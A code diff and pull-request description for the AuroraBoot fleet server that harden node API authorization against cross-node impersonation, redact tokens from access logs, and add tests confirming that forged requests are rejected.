+	BMCTargetStore        store.BMCTargetStore
+	Builder               builder.ArtifactBuilder
+	AdminPassword         string
+	RegToken              string
+	RegTokenFile          string // path where reg token is persisted (for rotation)
+	AuroraBootURL         string
+	ArtifactsDir          string
+	KeysDir               string  // base directory for SecureBoot key sets
+	Hub                   *ws.Hub // optional, created if nil
 }
 
 // New creates and configures an Echo server with all routes and middleware.
@@ -102,12 +102,26 @@ func New(cfg Config) *echo.Echo {
 	regGroup.Use(auth.RegistrationTokenAuth(&regToken))
 	regGroup.POST("/register", nodeHandler.Register)
 
-	// Agent node endpoints (node API key auth)
+	// Agent-only node endpoints (node API key auth). RequireNodeMatch binds
+	// every route to the authenticated node's identity: the :nodeID in the path
+	// must equal the node that the API key belongs to, so a registered node can
+	// only act on its own resources (prevents node-impersonation / BOLA).
 	agentGroup := e.Group("/api/v1/nodes/:nodeID")
 	agentGroup.Use(auth.NodeAPIKeyMiddleware(cfg.NodeStore))
+	agentGroup.Use(auth.RequireNodeMatch)
 	agentGroup.POST("/heartbeat", nodeHandler.Heartbeat)
-	agentGroup.GET("/commands", nodeHandler.GetCommands)
-	agentGroup.PUT("/commands/:commandID/status", cmdHandler.UpdateStatus)
+
+	// Shared command routes used by BOTH the agent (poll/report) and the
+	// admin/UI (inspect/override). Registered ONCE under AgentOrAdminMiddleware:
+	// registering them on two separate auth groups makes Echo silently shadow
+	// the first, which previously routed every agent poll into the admin-only
+	// handler (401). The handlers branch on the authenticated identity
+	// (auth.AuthNodeID): agents are node-scoped (own commands only), admins act
+	// across nodes.
+	sharedCmd := e.Group("/api/v1/nodes/:nodeID")
+	sharedCmd.Use(auth.AgentOrAdminMiddleware(cfg.AdminPassword, cfg.NodeStore))
+	sharedCmd.GET("/commands", nodeHandler.GetCommands)
+	sharedCmd.PUT("/commands/:commandID/status", cmdHandler.UpdateStatus)
 
 	// Admin/UI endpoints (admin password auth)
 	adminGroup := e.Group("/api/v1")
@@ -120,9 +134,10 @@ func New(cfg Config) *echo.Echo {
 	adminGroup.POST("/nodes/:nodeID/decommission", nodeHandler.Decommission)
 	adminGroup.PUT("/nodes/:nodeID/labels", nodeHandler.SetLabels)
 	adminGroup.PUT("/nodes/:nodeID/group", nodeHandler.SetGroup)
-	adminGroup.GET("/nodes/:nodeID/commands", nodeHandler.GetCommands)
+	// GET /nodes/:nodeID/commands and PUT .../commands/:commandID/status are
+	// served by the shared agent-or-admin group above (single registration to
+	// avoid Echo route shadowing); they branch on the caller's identity.
 	adminGroup.POST("/nodes/:nodeID/commands", cmdHandler.Create)
-	adminGroup.PUT("/nodes/:nodeID/commands/:commandID/status", cmdHandler.UpdateStatus)
 	adminGroup.DELETE("/nodes/:nodeID/commands/:commandID", cmdHandler.Delete)
 	adminGroup.DELETE("/nodes/:nodeID/commands", cmdHandler.ClearHistory)
 	adminGroup.POST("/nodes/commands", cmdHandler.CreateBulk)

--- a/pkg/server/server.go
+++ b/pkg/server/server.go
@@ -3,7 +3,9 @@ package server
 import (
 	"io"
 	"io/fs"
+	"log"
 	"net/http"
+	"net/url"
 	"strings"
 
 	"github.com/kairos-io/AuroraBoot/docs"
@@ -38,12 +40,61 @@ type Config struct {
 	Hub                   *ws.Hub // optional, created if nil
 }
 
+// redactToken returns requestURI with the value of any "token" query parameter
+// replaced by "REDACTED", so credentials passed as ?token= (WebSocket auth and
+// artifact download links) never reach the access log. Other query parameters
+// and the path are preserved to keep the log useful. If the URI cannot be
+// parsed but still references a token, it is fully redacted to err on the side
+// of never emitting the secret.
+func redactToken(requestURI string) string {
+	if !strings.Contains(requestURI, "token=") {
+		return requestURI
+	}
+
+	path := requestURI
+	rawQuery := ""
+	if i := strings.IndexByte(requestURI, '?'); i >= 0 {
+		path = requestURI[:i]
+		rawQuery = requestURI[i+1:]
+	}
+
+	values, err := url.ParseQuery(rawQuery)
+	if err != nil {
+		// Could not parse the query string; refuse to risk leaking the token.
+		return path + "?REDACTED"
+	}
+	if !values.Has("token") {
+		return requestURI
+	}
+	values.Set("token", "REDACTED")
+	return path + "?" + values.Encode()
+}
+
 // New creates and configures an Echo server with all routes and middleware.
 func New(cfg Config) *echo.Echo {
 	e := echo.New()
 	e.HideBanner = true
 
-	e.Use(middleware.Logger())
+	// Use a request logger whose URI is run through redactToken before it is
+	// written. All three auth schemes accept the credential as a ?token= query
+	// param (agent and UI WebSockets, artifact download links), so the raw
+	// request URI would otherwise leak admin passwords, node API keys, and the
+	// registration token straight into the access log (and any downstream proxy
+	// logs). RequestLoggerWithConfig (the non-deprecated logger) lets us emit a
+	// redacted URI explicitly instead of the verbatim ${uri} the default
+	// middleware.Logger() prints.
+	e.Use(middleware.RequestLoggerWithConfig(middleware.RequestLoggerConfig{
+		LogRemoteIP: true,
+		LogMethod:   true,
+		LogURI:      true,
+		LogStatus:   true,
+		LogLatency:  true,
+		LogValuesFunc: func(_ echo.Context, v middleware.RequestLoggerValues) error {
+			log.Printf("%s %s %s %d %s",
+				v.RemoteIP, v.Method, redactToken(v.URI), v.Status, v.Latency)
+			return nil
+		},
+	}))
 	e.Use(middleware.Recover())
 
 	regToken := cfg.RegToken

--- a/pkg/server/server_test.go
+++ b/pkg/server/server_test.go
@@ -81,23 +81,54 @@ func (f *fakeNodeStore) SetLabels(_ context.Context, _ string, _ map[string]stri
 }
 func (f *fakeNodeStore) Delete(_ context.Context, _ string) error { return nil }
 
-type fakeCommandStore struct{}
+type fakeCommandStore struct {
+	mu   sync.Mutex
+	cmds []*store.NodeCommand
+}
 
-func (f *fakeCommandStore) Create(_ context.Context, _ *store.NodeCommand) error     { return nil }
+func (f *fakeCommandStore) Create(_ context.Context, _ *store.NodeCommand) error { return nil }
 func (f *fakeCommandStore) GetByID(_ context.Context, _ string) (*store.NodeCommand, error) {
 	return nil, fmt.Errorf("not found")
 }
-func (f *fakeCommandStore) GetPending(_ context.Context, _ string) ([]*store.NodeCommand, error) {
-	return nil, nil
+func (f *fakeCommandStore) GetPending(_ context.Context, nodeID string) ([]*store.NodeCommand, error) {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	var out []*store.NodeCommand
+	for _, c := range f.cmds {
+		if c.ManagedNodeID == nodeID && c.Phase == store.CommandPending {
+			out = append(out, c)
+		}
+	}
+	return out, nil
 }
 func (f *fakeCommandStore) MarkDelivered(_ context.Context, _ []string) error { return nil }
 func (f *fakeCommandStore) UpdateStatus(_ context.Context, _ string, _ string, _ string) error {
 	return nil
 }
-func (f *fakeCommandStore) ListByNode(_ context.Context, _ string) ([]*store.NodeCommand, error) {
-	return nil, nil
+func (f *fakeCommandStore) UpdateStatusForNode(_ context.Context, id string, nodeID string, phase string, result string) error {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	for _, c := range f.cmds {
+		if c.ID == id && c.ManagedNodeID == nodeID {
+			c.Phase = phase
+			c.Result = result
+			return nil
+		}
+	}
+	return store.ErrCommandNotFound
 }
-func (f *fakeCommandStore) Delete(_ context.Context, _ string) error        { return nil }
+func (f *fakeCommandStore) ListByNode(_ context.Context, nodeID string) ([]*store.NodeCommand, error) {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	var out []*store.NodeCommand
+	for _, c := range f.cmds {
+		if c.ManagedNodeID == nodeID {
+			out = append(out, c)
+		}
+	}
+	return out, nil
+}
+func (f *fakeCommandStore) Delete(_ context.Context, _ string) error         { return nil }
 func (f *fakeCommandStore) DeleteTerminal(_ context.Context, _ string) error { return nil }
 
 type fakeGroupStore struct{}
@@ -128,18 +159,20 @@ var _ = Describe("Server", func() {
 	var (
 		e  *httptest.Server
 		ns *fakeNodeStore
+		cs *fakeCommandStore
 	)
 
 	BeforeEach(func() {
 		ns = &fakeNodeStore{}
+		cs = &fakeCommandStore{}
 		echoApp := server.New(server.Config{
 			NodeStore:     ns,
-			CommandStore:  &fakeCommandStore{},
+			CommandStore:  cs,
 			GroupStore:    &fakeGroupStore{},
 			Builder:       &fakeBuilder{},
 			AdminPassword: "admin-pass",
 			RegToken:      "reg-token",
-			AuroraBootURL:   "http://localhost:8080",
+			AuroraBootURL: "http://localhost:8080",
 		})
 		e = httptest.NewServer(echoApp)
 	})
@@ -209,6 +242,93 @@ var _ = Describe("Server", func() {
 			resp, err := http.DefaultClient.Do(req)
 			Expect(err).NotTo(HaveOccurred())
 			Expect(resp.StatusCode).To(Equal(http.StatusOK))
+		})
+	})
+
+	// Node-impersonation / BOLA: an agent authenticates with its own API key
+	// but the path carries a :nodeID. These specs prove a node can only act on
+	// its own resources — never another node's — even with a valid key.
+	Describe("Node impersonation (BOLA)", func() {
+		BeforeEach(func() {
+			ns.nodes = []*store.ManagedNode{
+				{ID: "node-A", APIKey: "key-A"},
+				{ID: "node-B", APIKey: "key-B"},
+			}
+		})
+
+		doReq := func(method, path, key, body string) *http.Response {
+			var r *http.Request
+			if body != "" {
+				r, _ = http.NewRequest(method, e.URL+path, strings.NewReader(body))
+				r.Header.Set("Content-Type", "application/json")
+			} else {
+				r, _ = http.NewRequest(method, e.URL+path, nil)
+			}
+			if key != "" {
+				r.Header.Set("Authorization", "Bearer "+key)
+			}
+			resp, err := http.DefaultClient.Do(r)
+			Expect(err).NotTo(HaveOccurred())
+			return resp
+		}
+
+		It("lets a node heartbeat for itself (200)", func() {
+			resp := doReq(http.MethodPost, "/api/v1/nodes/node-A/heartbeat", "key-A", `{"agentVersion":"1.0"}`)
+			Expect(resp.StatusCode).To(Equal(http.StatusOK))
+		})
+
+		It("blocks a node from heartbeating as another node (403)", func() {
+			resp := doReq(http.MethodPost, "/api/v1/nodes/node-B/heartbeat", "key-A", `{"agentVersion":"1.0"}`)
+			Expect(resp.StatusCode).To(Equal(http.StatusForbidden))
+		})
+
+		It("lets a node read its own commands (200)", func() {
+			resp := doReq(http.MethodGet, "/api/v1/nodes/node-A/commands", "key-A", "")
+			Expect(resp.StatusCode).To(Equal(http.StatusOK))
+		})
+
+		It("blocks a node from reading/consuming another node's commands (403)", func() {
+			// Seed a pending command for node-B; node-A must not be able to
+			// read it (and thereby mark it delivered).
+			cs.cmds = []*store.NodeCommand{
+				{ID: "cmd-B", ManagedNodeID: "node-B", Command: "upgrade", Phase: store.CommandPending},
+			}
+			resp := doReq(http.MethodGet, "/api/v1/nodes/node-B/commands", "key-A", "")
+			Expect(resp.StatusCode).To(Equal(http.StatusForbidden))
+			// The command must remain pending — not consumed by the attacker.
+			Expect(cs.cmds[0].Phase).To(Equal(store.CommandPending))
+		})
+
+		It("lets a node update the status of its own command (200)", func() {
+			cs.cmds = []*store.NodeCommand{
+				{ID: "cmd-A", ManagedNodeID: "node-A", Phase: store.CommandDelivered},
+			}
+			resp := doReq(http.MethodPut, "/api/v1/nodes/node-A/commands/cmd-A/status", "key-A", `{"phase":"Completed","result":"ok"}`)
+			Expect(resp.StatusCode).To(Equal(http.StatusOK))
+			Expect(cs.cmds[0].Phase).To(Equal(store.CommandCompleted))
+		})
+
+		It("blocks a node from updating another node's command via a forged path (403)", func() {
+			// Path nodeID mismatches the key's identity — RequireNodeMatch
+			// rejects before the handler runs.
+			cs.cmds = []*store.NodeCommand{
+				{ID: "cmd-B", ManagedNodeID: "node-B", Phase: store.CommandDelivered},
+			}
+			resp := doReq(http.MethodPut, "/api/v1/nodes/node-B/commands/cmd-B/status", "key-A", `{"phase":"Completed","result":"pwned"}`)
+			Expect(resp.StatusCode).To(Equal(http.StatusForbidden))
+			Expect(cs.cmds[0].Phase).To(Equal(store.CommandDelivered))
+		})
+
+		It("blocks a node from updating a foreign command id under its own path (403)", func() {
+			// Path nodeID matches the key (passes RequireNodeMatch), but the
+			// commandID belongs to node-B. The node-scoped store update matches
+			// zero rows and must surface as 403, not a silent 200.
+			cs.cmds = []*store.NodeCommand{
+				{ID: "cmd-B", ManagedNodeID: "node-B", Phase: store.CommandDelivered},
+			}
+			resp := doReq(http.MethodPut, "/api/v1/nodes/node-A/commands/cmd-B/status", "key-A", `{"phase":"Completed","result":"pwned"}`)
+			Expect(resp.StatusCode).To(Equal(http.StatusForbidden))
+			Expect(cs.cmds[0].Phase).To(Equal(store.CommandDelivered))
 		})
 	})
 

--- a/pkg/store/store.go
+++ b/pkg/store/store.go
@@ -2,8 +2,15 @@ package store
 
 import (
 	"context"
+	"errors"
 	"time"
 )
+
+// ErrCommandNotFound is returned by node-scoped command lookups/updates when no
+// command matches both the command id and the owning node. Callers use it to
+// fail closed (404/403) rather than silently succeeding on a foreign or
+// non-existent command.
+var ErrCommandNotFound = errors.New("command not found")
 
 // NodeGroup represents a logical group/environment for nodes (e.g., "production", "staging").
 type NodeGroup struct {
@@ -114,6 +121,11 @@ type CommandStore interface {
 	GetPending(ctx context.Context, nodeID string) ([]*NodeCommand, error)
 	MarkDelivered(ctx context.Context, ids []string) error
 	UpdateStatus(ctx context.Context, id string, phase string, result string) error
+	// UpdateStatusForNode updates a command's status only if it belongs to
+	// nodeID. It returns ErrCommandNotFound when no command matches both the
+	// command id and the owning node, so callers can fail closed (403/404)
+	// instead of silently succeeding on a foreign or missing command.
+	UpdateStatusForNode(ctx context.Context, id string, nodeID string, phase string, result string) error
 	ListByNode(ctx context.Context, nodeID string) ([]*NodeCommand, error)
 	Delete(ctx context.Context, id string) error
 	DeleteTerminal(ctx context.Context, nodeID string) error
@@ -121,40 +133,40 @@ type CommandStore interface {
 
 // ArtifactRecord stores a build artifact and its metadata.
 type ArtifactRecord struct {
-	ID            string    `json:"id" gorm:"primaryKey"`
-	Name          string    `json:"name,omitempty"`
-	Saved         bool      `json:"saved,omitempty"`
-	Phase         string    `json:"phase"`
-	Message       string    `json:"message"`
-	BaseImage     string    `json:"baseImage"`
-	KairosVersion string    `json:"kairosVersion"`
-	Model         string    `json:"model"`
-	ISO           bool      `json:"iso"`
-	CloudImage    bool      `json:"cloudImage"`
-	Netboot       bool      `json:"netboot"`
-	FIPS          bool      `json:"fips"`
-	TrustedBoot   bool      `json:"trustedBoot"`
-	Arch              string `json:"arch,omitempty"`
-	Variant           string `json:"variant,omitempty"`
-	RawDisk           bool   `json:"rawDisk"`
-	Tar               bool   `json:"tar"`
-	GCE               bool   `json:"gce"`
-	VHD               bool   `json:"vhd"`
-	UKI               bool   `json:"uki"`
-	KairosInitImage   string `json:"kairosInitImage,omitempty"`
-	AutoInstall       bool   `json:"autoInstall"`
-	RegisterAuroraBoot  bool   `json:"registerAuroraBoot"`
-	Dockerfile        string `json:"dockerfile,omitempty"`
-	CloudConfig       string `json:"cloudConfig,omitempty" gorm:"type:text"`
-	KubernetesDistro  string `json:"kubernetesDistro,omitempty"`
-	KubernetesVersion string `json:"kubernetesVersion,omitempty"`
-	TargetGroupID     string `json:"targetGroupId,omitempty"`
-	ContainerImage    string `json:"containerImage,omitempty"`
-	OverlayRootfs string    `json:"overlayRootfs,omitempty"`
-	ArtifactFiles []string  `json:"artifacts" gorm:"serializer:json"`
-	Logs          string    `json:"-" gorm:"type:text"`
-	CreatedAt     time.Time `json:"createdAt"`
-	UpdatedAt     time.Time `json:"updatedAt"`
+	ID                 string    `json:"id" gorm:"primaryKey"`
+	Name               string    `json:"name,omitempty"`
+	Saved              bool      `json:"saved,omitempty"`
+	Phase              string    `json:"phase"`
+	Message            string    `json:"message"`
+	BaseImage          string    `json:"baseImage"`
+	KairosVersion      string    `json:"kairosVersion"`
+	Model              string    `json:"model"`
+	ISO                bool      `json:"iso"`
+	CloudImage         bool      `json:"cloudImage"`
+	Netboot            bool      `json:"netboot"`
+	FIPS               bool      `json:"fips"`
+	TrustedBoot        bool      `json:"trustedBoot"`
+	Arch               string    `json:"arch,omitempty"`
+	Variant            string    `json:"variant,omitempty"`
+	RawDisk            bool      `json:"rawDisk"`
+	Tar                bool      `json:"tar"`
+	GCE                bool      `json:"gce"`
+	VHD                bool      `json:"vhd"`
+	UKI                bool      `json:"uki"`
+	KairosInitImage    string    `json:"kairosInitImage,omitempty"`
+	AutoInstall        bool      `json:"autoInstall"`
+	RegisterAuroraBoot bool      `json:"registerAuroraBoot"`
+	Dockerfile         string    `json:"dockerfile,omitempty"`
+	CloudConfig        string    `json:"cloudConfig,omitempty" gorm:"type:text"`
+	KubernetesDistro   string    `json:"kubernetesDistro,omitempty"`
+	KubernetesVersion  string    `json:"kubernetesVersion,omitempty"`
+	TargetGroupID      string    `json:"targetGroupId,omitempty"`
+	ContainerImage     string    `json:"containerImage,omitempty"`
+	OverlayRootfs      string    `json:"overlayRootfs,omitempty"`
+	ArtifactFiles      []string  `json:"artifacts" gorm:"serializer:json"`
+	Logs               string    `json:"-" gorm:"type:text"`
+	CreatedAt          time.Time `json:"createdAt"`
+	UpdatedAt          time.Time `json:"updatedAt"`
 }
 
 // Artifact phases.

--- a/pkg/ws/handler.go
+++ b/pkg/ws/handler.go
@@ -3,6 +3,7 @@ package ws
 import (
 	"context"
 	"encoding/json"
+	"errors"
 	"log"
 	"net/http"
 	"time"
@@ -108,7 +109,7 @@ func (h *AgentHandler) HandleAgentWS(c echo.Context) error {
 		case "heartbeat":
 			h.handleHeartbeat(node.ID, msg.Data)
 		case "command_status":
-			h.handleCommandStatus(msg.Data)
+			h.handleCommandStatus(node.ID, msg.Data)
 		default:
 			log.Printf("ws unknown message type from node %s: %s", node.ID, msg.Type)
 		}
@@ -133,7 +134,11 @@ func (h *AgentHandler) handleHeartbeat(nodeID string, data json.RawMessage) {
 	}
 }
 
-func (h *AgentHandler) handleCommandStatus(data json.RawMessage) {
+// handleCommandStatus applies a command_status report from the agent. The
+// update is scoped to nodeID — the node this WS connection authenticated as —
+// so a node cannot move another node's command by sending its id. A miss
+// (foreign or unknown command) is rejected without broadcasting.
+func (h *AgentHandler) handleCommandStatus(nodeID string, data json.RawMessage) {
 	var status commandStatusData
 	if err := json.Unmarshal(data, &status); err != nil {
 		log.Printf("ws invalid command_status: %v", err)
@@ -143,8 +148,13 @@ func (h *AgentHandler) handleCommandStatus(data json.RawMessage) {
 	// context.Background() is correct here: handleCommandStatus is called from
 	// the WS read loop which outlives the original HTTP request context.
 	ctx := context.Background()
-	if err := h.Commands.UpdateStatus(ctx, status.ID, status.Phase, status.Result); err != nil {
-		log.Printf("ws: failed to update command status for %s: %v", status.ID, err)
+	if err := h.Commands.UpdateStatusForNode(ctx, status.ID, nodeID, status.Phase, status.Result); err != nil {
+		if errors.Is(err, store.ErrCommandNotFound) {
+			log.Printf("ws: node %s attempted to update command %s it does not own; rejected", nodeID, status.ID)
+		} else {
+			log.Printf("ws: failed to update command status for %s: %v", status.ID, err)
+		}
+		return
 	}
 
 	if h.Hub != nil && h.Hub.UI != nil {

--- a/pkg/ws/handler_test.go
+++ b/pkg/ws/handler_test.go
@@ -6,6 +6,7 @@ import (
 	"fmt"
 	"net/http"
 	"net/http/httptest"
+	"path/filepath"
 	"strings"
 	"sync/atomic"
 	"time"
@@ -85,12 +86,17 @@ var _ = Describe("WebSocket Handler", func() {
 
 	BeforeEach(func() {
 		var err error
-		// Increment first so every spec gets a fresh, unique DSN — two
-		// specs sharing a name would collide under cache=shared and
-		// cause flaky "database is closed" / "table is locked" races
-		// when the previous spec's handler goroutines haven't drained.
+		// Every spec gets its own private, on-disk SQLite database in a
+		// per-spec temp dir. We deliberately do NOT use a shared-cache
+		// in-memory DSN (`mode=memory&cache=shared`): SQLite's shared cache
+		// is process-wide, so every spec's in-memory DB would contend on a
+		// single global write lock. A prior spec's still-draining read-loop
+		// goroutine could then hold that lock long enough (up to the 5s
+		// busy_timeout, retried) to starve the current spec's command_status
+		// write past its Eventually deadline — the source of the flake.
+		// A file-per-spec DB has no cross-spec lock contention.
 		machineNum := testCounter.Add(1)
-		dbName := fmt.Sprintf("file:ws_test_%d?mode=memory&cache=shared", machineNum)
+		dbName := filepath.Join(GinkgoT().TempDir(), fmt.Sprintf("ws_test_%d.db", machineNum))
 		gormDB, err = gormstore.New(dbName)
 		Expect(err).NotTo(HaveOccurred())
 
@@ -110,11 +116,6 @@ var _ = Describe("WebSocket Handler", func() {
 		Expect(nodeID).NotTo(BeEmpty())
 		Expect(apiKey).NotTo(BeEmpty())
 
-		DeferCleanup(func() {
-			server.Close()
-			_ = gormDB.Close()
-		})
-
 		agentHandler := &ws.AgentHandler{
 			Hub:      hub,
 			Nodes:    nodes,
@@ -126,10 +127,16 @@ var _ = Describe("WebSocket Handler", func() {
 		e.GET("/api/v1/ws", agentHandler.HandleAgentWS)
 		e.GET("/api/v1/ws/ui", uiHandler.HandleUIWS)
 		server = httptest.NewServer(e)
-	})
 
-	AfterEach(func() {
-		server.Close()
+		// Tear down in reverse: close the server first so it blocks until
+		// every in-flight WS handler goroutine (and its read-loop) has
+		// returned, THEN close the DB. Closing the DB while a read-loop is
+		// still writing would race. DeferCleanup runs LIFO, so this is the
+		// only teardown hook — no separate AfterEach.
+		DeferCleanup(func() {
+			server.Close()
+			_ = gormDB.Close()
+		})
 	})
 
 	Describe("Agent connection", func() {

--- a/pkg/ws/handler_test.go
+++ b/pkg/ws/handler_test.go
@@ -11,8 +11,8 @@ import (
 	"time"
 
 	"github.com/gorilla/websocket"
-	"github.com/kairos-io/AuroraBoot/pkg/store"
 	gormstore "github.com/kairos-io/AuroraBoot/internal/store/gorm"
+	"github.com/kairos-io/AuroraBoot/pkg/store"
 	"github.com/kairos-io/AuroraBoot/pkg/ws"
 	"github.com/labstack/echo/v4"
 	. "github.com/onsi/ginkgo/v2"
@@ -240,6 +240,50 @@ var _ = Describe("WebSocket Handler", func() {
 				}
 				return c.Phase
 			}, 10*time.Second, 100*time.Millisecond).Should(Equal(store.CommandCompleted))
+		})
+
+		It("should reject a command_status for a command owned by another node", func() {
+			// Register a second node and queue a command for IT.
+			otherNum := testCounter.Add(1000)
+			other := &store.ManagedNode{
+				MachineID: fmt.Sprintf("machine-other-%d", otherNum),
+				Hostname:  "other-host",
+				Labels:    map[string]string{},
+			}
+			Expect(nodes.Register(bg, other)).To(Succeed())
+
+			foreign := &store.NodeCommand{
+				ManagedNodeID: other.ID,
+				Command:       "upgrade",
+			}
+			Expect(commands.Create(bg, foreign)).To(Succeed())
+			Expect(commands.UpdateStatus(bg, foreign.ID, store.CommandDelivered, "")).To(Succeed())
+
+			// Connect as the FIRST node and try to move the other node's command.
+			conn, _, err := dialWS(server, "/api/v1/ws?token="+apiKey)
+			Expect(err).NotTo(HaveOccurred())
+			defer conn.Close()
+
+			Eventually(func() bool {
+				return hub.IsOnline(nodeID)
+			}, 10*time.Second, 100*time.Millisecond).Should(BeTrue())
+
+			status := commandStatusData{
+				ID:     foreign.ID,
+				Phase:  store.CommandCompleted,
+				Result: "pwned",
+			}
+			Expect(sendMsg(conn, "command_status", status)).To(Succeed())
+
+			// The foreign command must stay Delivered — the impersonating
+			// node's update is dropped. Consistently holds over the window.
+			Consistently(func() string {
+				c, _ := commands.GetByID(bg, foreign.ID)
+				if c == nil {
+					return ""
+				}
+				return c.Phase
+			}, 1*time.Second, 100*time.Millisecond).Should(Equal(store.CommandDelivered))
 		})
 
 		It("should send pending commands on connect", func() {


### PR DESCRIPTION
## Fleet-server security hardening

Closes the Critical/High blockers from the non-Redfish review (kairos-io/kairos#4117). Independent of the Redfish work; **recommended to merge FIRST** (see note).

### Fixes
| Commit | Fix | Sev |
|---|---|---|
| `1640efc` | **BOLA / node-impersonation** — agent endpoints bound to the authenticated node (route middleware + handler recheck + atomic node-scoped store update); also fixes a route-shadowing bug that made agent REST polling return 401 | Critical |
| `d8e9c03` | **`losetup -D`** global loop-device detach removed (was detaching every host loop device) | Critical |
| `9ce77d2` | **TLS** option (`--tls-cert`/`--tls-key`) + **credential `?token=` redaction** in access logs | High |
| `1a784f3` | kairos-init Dockerfile-RUN **command-injection** input validation | High |
| `d99e5ea` | SecureBoot key-name **path-traversal** validation | High |
| `27fe702` | `UploadOverlay` safe in-process **tar extraction** (containment + symlink reject + size caps) | Med |
| `723663c` | invalid build inputs return **400** (not 500) | Low |

### Validation
- All packages build; unit tests green. The BOLA fix was security-reviewed (ship-it; three-layer enforcement, fails closed, no existence oracle).
- A curl-driven harness exercised every fix against a running server (**24/24 PASS**): cross-node 403s, HTTPS, log redaction, and 400s on malicious build/keyname/overlay input.

### Merge note
This PR and the Redfish PR (kairos-io/kairos#4109) both touch `internal/cmd/web.go` and `pkg/server/server.go` additively. **Merge this one first**; the Redfish PR then rebases onto it (the combined state is already proven in an integration branch — conflicts are small/additive).

🤖 Generated with [Claude Code](https://claude.com/claude-code)
